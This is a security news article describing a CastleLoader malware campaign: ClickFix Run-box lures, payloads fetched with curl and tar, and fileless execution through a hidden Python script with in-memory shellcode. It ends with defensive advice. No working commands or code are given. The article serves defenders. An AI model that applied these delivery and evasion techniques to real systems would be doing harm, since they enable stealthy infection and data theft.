Python Undercover: How CastleLoader’s New Tactics Slip Past Security Defenses

It starts with a simple prompt: “Press Win + R and enter this command.” For unsuspecting victims, this seemingly harmless instruction is the gateway to a sophisticated new malware campaign. CastleLoader, a malicious tool first flagged last year, is back - and it’s smarter, stealthier, and more elusive than ever, thanks to a cunning use of Python scripting. Security researchers warn this evolution could signal a new era of hard-to-detect cyberattacks targeting everyday users and businesses alike.

The Anatomy of a Modern Malware Attack

CastleLoader’s latest campaign, uncovered by Blackpoint Cyber’s Adversary Pursuit Group, reveals a shift in the malware’s delivery and execution methods. Historically, attackers used a phishing trick known as “ClickFix,” where victims are duped into running a command in the Windows Run box. That single command quietly leverages Windows utilities - curl.exe and tar - to fetch and unpack a hidden, encrypted payload, all behind the scenes in a concealed folder.

The real innovation, however, is in what happens next. Instead of dropping an obvious executable file, CastleLoader now launches a tiny Python script using pythonw.exe, ensuring there’s no visible command window. This script, running invisibly, reconstructs and executes the malware directly in the computer’s memory. This “fileless” approach makes it far harder for traditional antivirus tools to spot or block the threat.

Researchers found that the attackers employ advanced techniques such as Python bytecode execution, in-memory shellcode loading, and PEB Walking - a method for dynamically finding system functions at runtime - to further evade detection. Once established, CastleLoader connects to its control server, using a unique “GoogeBot” User-Agent tag as a calling card, and downloads any malicious payload the attackers choose, from remote access trojans to info-stealers like Stealc and RedLine.

What Can Be Done?

Experts warn that the weakest link remains human curiosity and trust. The “ClickFix” ruse relies on people following instructions that seem legitimate. Blackpoint’s team urges organizations to train users to be wary of any prompts to use the Windows Run dialog, especially for supposed “fixes” or verifications.

Administrators should consider locking down access to the Run box, command-line tools, and Python interpreters for everyday users, and monitor for suspicious processes - like Python launching from the AppData folder. As malware authors embrace more flexible and evasive programming languages, defenders will need to adapt just as quickly.